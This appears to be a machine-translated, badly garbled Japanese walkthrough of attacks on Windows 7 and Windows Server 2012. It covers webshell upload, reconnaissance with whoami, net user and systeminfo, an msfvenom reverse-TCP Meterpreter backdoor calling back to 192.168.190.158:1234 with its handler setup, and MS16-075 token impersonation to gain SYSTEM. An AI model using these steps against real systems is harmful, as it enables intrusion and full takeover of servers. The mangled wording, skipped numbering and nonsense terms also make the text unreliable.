A、win7の
1は、アクセス、サーバーにアップロードウェブシェル
任意のコマンドへのリードを実行することができ、win7のアクセス権が設定されていないので2、
右への直接参照を使用して、またMSFツールによってEXP使用する権利を提供することができ、成功するために、今日ではやって手遅れ
二、win2012
書かれた1は、Webサーバ上でマレーシアを置きます
2、正常に実行にwhoamiテストマシン訪問マレーシア、実行、アカウントは、IISサービスです
図3に示すように、パッチ情報を取得するためにシステムのシステムサーバ・システムを実行します
4、何の成功を追加していない/ネットユーザーを使用して、ユーザーを表示することができ、ネットユーザーにしてみてください
6、テストスクリプト読み書きできるスクリプトを使用してアップロードディレクトリ、読み書き可能なディレクトリアウトテスト
7、msfvenom生成されたバックドアのリスニングポートを使用して
msfvenom -p窓/ meterpreter / reverse_tcp lhost = 192.168.190.158 lportは= 1234 -f exeファイル-o ./hack.exeバックドア、アップロードを生成します
実施を監視
1)使用は/マルチ/ハンドラを利用します
2)セットペイロードの窓/ meterpreter / reverse_tcp
3)LHOST 192.168.190.158セットを設定します
4)lportは1234年
5)エクスプロイト
右のはもちろんのこと、ターゲットサーバ上のHack.exeプログラムの実行
8、正常に受信されたセッション
図9は、msf16-075の使用は、以下のコマンドを実行した後、右に置くこと
使用お忍び
list_tokens -u
-cH -f ./potato.exeを実行します
10は、特権を、
ms16-075言及右のプログラムを実行した後、再度、次のコマンドを実行NT AUTHORITYSYSTEM権限に現在のユーザー権限を取得します。
list_tokens -u
"NT AUTHORITYSYSTEM" impersonate_token
guyed
成功する権利を言及
完成